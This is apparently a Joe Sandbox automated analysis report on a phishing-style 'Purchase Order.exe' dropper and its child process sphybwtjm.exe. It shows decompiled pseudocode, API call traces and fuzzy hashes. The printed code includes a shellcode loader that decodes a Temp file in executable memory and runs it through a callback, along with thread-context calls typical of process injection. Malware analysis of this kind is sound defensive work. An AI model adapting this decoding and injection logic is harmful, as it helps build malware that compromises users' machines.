0x0040554a
0x00405582
0x00405582
0x00000000
0x00405582
0x00405556
0x00405558
0x00000000
0x00405558
0x00405527
0x00000000
0x00000000
0x0040552e
0x00000000

APIs

IsWindowVisible.USER32 ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe","C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe","C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,0042C248), ref: 0040645C

Strings

"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe", xrefs: 00406412

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CloseQueryValue
String ID: "C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"
API String ID: 3356406503-1819367740
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,772EFAA0,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32 ref: 00403B78

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E58(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405e59
0x00405e63
0x00405e66
0x00405e6c
0x00405e6d
0x00405e6e
0x00405e76
0x00000000
0x00000000
0x00000000
0x00405e76
0x00405e78
0x00405e80

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00405E6E

Strings

C:\Users\user\Desktop, xrefs: 00405E58

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa2
0x00405fa4
0x00405fa7
0x00405fd3
0x00405fac
0x00405fb5
0x00405fba
0x00405fc5
0x00405fc8
0x00405fe4
0x00405fca
0x00405fd1
0x00000000
0x00405fd1
0x00405fdd
0x00405fe1
0x00405fe1
0x00405fdb
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sphybwtjm.exePID: 4444, Parent PID: 1380COMMON

Execution Graph

Execution Coverage:	58.2%
Dynamic/Decrypted Code Coverage:	86.3%
Signature Coverage:	25.8%
Total number of Nodes:	124
Total number of Limit Nodes:	10

Executed Functions

Function 00700434 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 292
threadfilenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00700608
NtSetInformationFile.NTDLL(00000000,?,00000001,00000001,0000000D,?), ref: 0070062E
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00700644
CreateProcessInternalW.KERNELBASE(00000000,00000000,00000000), ref: 007006A9
GetThreadContext.KERNELBASE(00000000,00010002,000000FF,000000FF,?), ref: 0070071E
SetThreadContext.KERNELBASE(00000000,00010002), ref: 00700734
GetThreadContext.KERNELBASE(00000000,?,?,00000000,000002CC), ref: 00700762

Strings

D, xrefs: 0070067F

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID: ContextFileThread$CreateInformationInternalNameProcessTempWrite
String ID: D
API String ID: 2732076800-2746444292
Opcode ID: 1e0f184c7e1d3546105a5e1430fe1a34de2c1558cb1508956bbefc95b08ac37e
Instruction ID: d1ccf54187ba8bfbabe9843aaaad4a8c2f3d599429d45a3e9ffb1838a9e4973b
Opcode Fuzzy Hash: 1e0f184c7e1d3546105a5e1430fe1a34de2c1558cb1508956bbefc95b08ac37e
Instruction Fuzzy Hash: C1A17A71900249EEEF219BA4CC49FEEBBF9AF45324F104256F604F61D0E7798A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00700227 Relevance: 4.7, APIs: 3, Instructions: 190
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00700345
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00700364
ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00700373

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 695530b7342bed9030fcd6c64ea109e9a9628119c2dfa55732b329029ab204e5
Instruction ID: 88a4b13eb839962527b922ab1f047fcd12b90d565b129f456f478a8b83655f57
Opcode Fuzzy Hash: 695530b7342bed9030fcd6c64ea109e9a9628119c2dfa55732b329029ab204e5
Instruction Fuzzy Hash: 41512721900258AAEF109AB0DCA9FEF67F9DF06764F106212F600F71D1E7798B09C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 007007D6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenFile.NTDLL(?,C0110000,?,?,00000003,00000020), ref: 0070091D

Strings

@, xrefs: 007008EC

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID: FileOpen
String ID: @
API String ID: 2669468079-2766056989
Opcode ID: 19caec6dd40f52b6f0ef17a3ad01d84d1883288dd5664aeef26832a7f8143953
Instruction ID: 115cb8bd3d9ee931a48e8c76aa7fd94a310249cdbe49f503c26e09810e24ce85
Opcode Fuzzy Hash: 19caec6dd40f52b6f0ef17a3ad01d84d1883288dd5664aeef26832a7f8143953
Instruction Fuzzy Hash: 9F418F31D1024CEADF10DBF4D945AEEB7B8EF58314F10426AE504FB290E7745A49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00A311C0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 187
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00A311C0() {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				_Unknown_base(*)()* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				long _v80;
				short _v600;
				void* _t99;
				int _t105;
				signed int _t110;

				_v76 =  *0xa40010;
				_v72 =  *0xa40014;
				_v68 =  *0xa40018;
				_v64 =  *0xa4001c;
				_v60 =  *0xa40020;
				_v56 =  *0xa40024;
				_v12 = 0;
				_v16 = E00A311A0();
				_v36 = GetProcAddress(_v16, 0xa40028);
				_v52 = GetProcAddress(_v16, 0xa40034);
				_v48 = GetProcAddress(_v16, 0xa40040);
				_v44 = GetProcAddress(_v16, 0xa40050);
				_v40 = GetProcAddress(_v16, 0xa4005c);
				_v24 = 0;
				_t99 = malloc(0x2625a00); // executed
				_v24 = _t99;
				memset(_v24, 0xff, 0x2625a00);
				if(_v24 != 0) {
					if(GetTempPathW(0x103,  &_v600) != 0) {
						_push( &_v76);
						_push( &_v600);
						if(_v36() != 0) {
							_t105 = CreateFileW( &_v600, 0x80000000, 1, 0, 3, 0x80, 0);
							_v28 = _t105;
							if(_v28 != 0xffffffff) {
								_v32 = _v44(_v28, 0);
								_v20 = VirtualAlloc(0, _v32, 0x3000, 0x40);
								_t105 = ReadFile(_v28, _v20, _v32,  &_v80, 0);
								if(_t105 != 0) {
									_v12 = 0;
									while(_v12 < _v32) {
										_v5 =  *((intOrPtr*)(_v20 + _v12));
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ 0x000000b0;
										_v5 = (_v5 & 0x000000ff) - 8;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ _v12;
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 = _v5 & 0x000000ff ^ 0x00000010;
										_v5 =  ~(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - 0xfa;
										_v5 = _v5 & 0x000000ff ^ _v12;
										_v5 = (_v5 & 0x000000ff) - 0x7a;
										_v5 =  !(_v5 & 0x000000ff);
										 *((char*)(_v20 + _v12)) = _v5;
										_v12 = _v12 + 1;
									}
									_t110 = EnumResourceTypesA(0, _v20, 0); // executed
									return  !_t110 - 0x0000eef9 ^ 0x00014df3;
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					} else {
						goto L15;
					}
				} else {
					_t105 = 0;
					L15:
					return _t105;
				}
			}

0x00a311cf
0x00a311d8
0x00a311e1
0x00a311e9
0x00a311f2
0x00a311fb
0x00a311fe
0x00a3120a
0x00a3121c
0x00a3122e
0x00a31240
0x00a31252
0x00a31264
0x00a31267
0x00a31273
0x00a3127b
0x00a3128c
0x00a31298
0x00a312b5
0x00a312bf
0x00a312c6
0x00a312cc
0x00a312ec
0x00a312ef
0x00a312f6
0x00a31306
0x00a31319
0x00a3132e
0x00a31333
0x00a3133a
0x00a3134c
0x00a31360
0x00a3136a
0x00a31373
0x00a31380
0x00a3138a
0x00a31393
0x00a3139d
0x00a313a6
0x00a313b0
0x00a313ba
0x00a313c4
0x00a313cd
0x00a313da
0x00a313e4
0x00a313ee
0x00a313f7
0x00a31403
0x00a31349
0x00a31349
0x00a31412
0x00a31424
0x00a31335
0x00000000
0x00a31335
0x00a312f8
0x00000000
0x00a312f8
0x00a312ce
0x00000000
0x00a312ce
0x00a312b7
0x00000000
0x00a312b7
0x00a3129a
0x00a3129a
0x00a3e3ae
0x00a3e3b2
0x00a3e3b2

APIs

GetProcAddress.KERNEL32(00000000,00A40028), ref: 00A31216
GetProcAddress.KERNEL32(00000000,00A40034), ref: 00A31228
GetProcAddress.KERNEL32(00000000,00A40040), ref: 00A3123A
GetProcAddress.KERNEL32(00000000,00A40050), ref: 00A3124C
GetProcAddress.KERNEL32(00000000,00A4005C), ref: 00A3125E
malloc.MSVCRT ref: 00A31273
memset.MSVCRT ref: 00A3128C
GetTempPathW.KERNEL32(00000103,?), ref: 00A312AD

Strings

N)w, xrefs: 00A31216, 00A31228, 00A3123A, 00A3124C, 00A3125E
`!)w, xrefs: 00A31412

Memory Dump Source

Source File: 00000001.00000002.266696802.0000000000A31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000001.00000002.266688157.0000000000A30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.266718154.0000000000A3F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.266726016.0000000000A41000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a30000_sphybwtjm.jbxd

Similarity

API ID: AddressProc$PathTempmallocmemset
String ID: `!)w$N)w
API String ID: 3927944005-1111983535
Opcode ID: 3597339d67147d5938f07ddfd34588280950f56c352aeade7b3d0d3e87a51bf1
Instruction ID: c1886e2c092efa1b9ff0dafa3b67efca514c87651798caea325fa59240ede593
Opcode Fuzzy Hash: 3597339d67147d5938f07ddfd34588280950f56c352aeade7b3d0d3e87a51bf1
Instruction Fuzzy Hash: C8818D78D08288AFDB00CBE9D890BEEBFB4AF59301F008099E591B7281D635564ADB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A31000 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				WCHAR* _v8;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOW _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t37;
				intOrPtr _t38;
				signed int _t40;
				int _t42;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t52;
				int _t58;
				intOrPtr* _t61;
				intOrPtr _t66;

				_push(0xffffffff);
				_push(0xa3f128);
				_push(0xa3e3cd);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_v28 = _t66 - 0x68;
				_v8 = 0;
				_t58 = 2;
				__set_app_type(_t58);
				 *0xa40080 =  *0xa40080 | 0xffffffff;
				 *0xa40084 =  *0xa40084 | 0xffffffff;
				 *(__p__fmode()) =  *0xa4007c;
				 *(__p__commode()) =  *0xa40078;
				 *0xa40088 = _adjust_fdiv;
				E00A3119A( *_adjust_fdiv);
				if( *0xa40068 == 0) {
					__setusermatherr(E00A31197);
				}
				E00A31185();
				L00A3E3C7();
				_v112 =  *0xa40074;
				__imp____wgetmainargs( &_v100,  &_v116,  &_v104,  *0xa40070,  &_v112, 0xa40008, 0xa4000c); // executed
				_push(0xa40004);
				_push(0xa40000);
				L00A3E3C7();
				_t37 = __imp___wcmdln;
				_t61 =  *_t37;
				if(_t61 != 0) {
					_v120 = _t61;
					if( *_t61 != 0x22) {
						while( *_t61 > 0x20) {
							_t61 = _t61 + _t58;
							_v120 = _t61;
						}
					} else {
						do {
							_t61 = _t61 + _t58;
							_v120 = _t61;
							_t44 =  *_t61;
						} while (_t44 != 0 && _t44 != 0x22);
						if( *_t61 == 0x22) {
							L8:
							_t61 = _t61 + _t58;
							_v120 = _t61;
						}
					}
					_t38 =  *_t61;
					if(_t38 != 0 && _t38 <= 0x20) {
						goto L8;
					}
					_v96.dwFlags = 0;
					GetStartupInfoW( &_v96);
					if((_v96.dwFlags & 0x00000001) == 0) {
						_t40 = 0xa;
					} else {
						_t40 = _v96.wShowWindow & 0x0000ffff;
					}
					_push(_t40);
					_push(_t61);
					_push(0);
					_push(GetModuleHandleW(0)); // executed
					_t42 = E00A311C0(); // executed
					_v108 = _t42;
					exit(_t42);
					_t43 = _v24;
					_t52 =  *((intOrPtr*)( *_t43));
					_v124 = _t52;
					_push(_t43);
					_push(_t52);
					L00A3E3C1();
					return _t43;
				} else {
					_v8 = _v8 | 0xffffffff;
					 *[fs:0x0] = _v20;
					return _t37;
				}
			}

0x00a31003
0x00a31005
0x00a3100a
0x00a31015
0x00a31016
0x00a31023
0x00a31028
0x00a3102d
0x00a3102f
0x00a31036
0x00a3103d
0x00a31050
0x00a3105e
0x00a31067
0x00a3106c
0x00a31077
0x00a3107e
0x00a31084
0x00a31085
0x00a31094
0x00a3109e
0x00a310b7
0x00a310bd
0x00a310c2
0x00a310c7
0x00a310cf
0x00a310d4
0x00a310d8
0x00a310ed
0x00a310f4
0x00a3113b
0x00a31141
0x00a31143
0x00a31143
0x00a310f6
0x00a310f6
0x00a310f6
0x00a310f8
0x00a310fb
0x00a310fe
0x00a3110d
0x00a3110f
0x00a3110f
0x00a31111
0x00a31111
0x00a3110d
0x00a31114
0x00a3111a
0x00000000
0x00000000
0x00a31122
0x00a31129
0x00a31133
0x00a3114a
0x00a31135
0x00a31135
0x00a31135
0x00a3114b
0x00a3114c
0x00a3114d
0x00a31155
0x00a31156
0x00a3115b
0x00a3115f
0x00a31165
0x00a3116a
0x00a3116c
0x00a3116f
0x00a31170
0x00a31171
0x00a31178
0x00a310da
0x00a310da
0x00a310e1
0x00a310ec
0x00a310ec

APIs

__set_app_type.MSVCRT ref: 00A3102F
__p__fmode.MSVCRT ref: 00A31044
__p__commode.MSVCRT ref: 00A31052
__setusermatherr.MSVCRT ref: 00A3107E
_initterm.MSVCRT ref: 00A31094
__wgetmainargs.KERNELBASE ref: 00A310B7
_initterm.MSVCRT ref: 00A310C7
GetStartupInfoW.KERNEL32(?), ref: 00A31129
GetModuleHandleW.KERNEL32(00000000,00000000,?,0000000A), ref: 00A3114F
exit.MSVCRT ref: 00A3115F
_XcptFilter.MSVCRT ref: 00A31171

Strings

PP)wN)w, xrefs: 00A31129

Memory Dump Source

Source File: 00000001.00000002.266696802.0000000000A31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000001.00000002.266688157.0000000000A30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.266718154.0000000000A3F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.266726016.0000000000A41000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a30000_sphybwtjm.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargsexit
String ID: PP)wN)w
API String ID: 3327129161-2374255611
Opcode ID: 0a62b5dfc76c48fc9d6a88fa53b5ced3999ddea57fbccde1afe87c59e16c8719
Instruction ID: 48d902e6b337141a964bcc9167ad1866eb7dd078fa5d7a927a33ee21f9a244b7
Opcode Fuzzy Hash: 0a62b5dfc76c48fc9d6a88fa53b5ced3999ddea57fbccde1afe87c59e16c8719
Instruction Fuzzy Hash: 0D414BBAD00204EFCB24DFE8ED45AA9BBB8FB85710F10462EFA1597291E7744842DB50

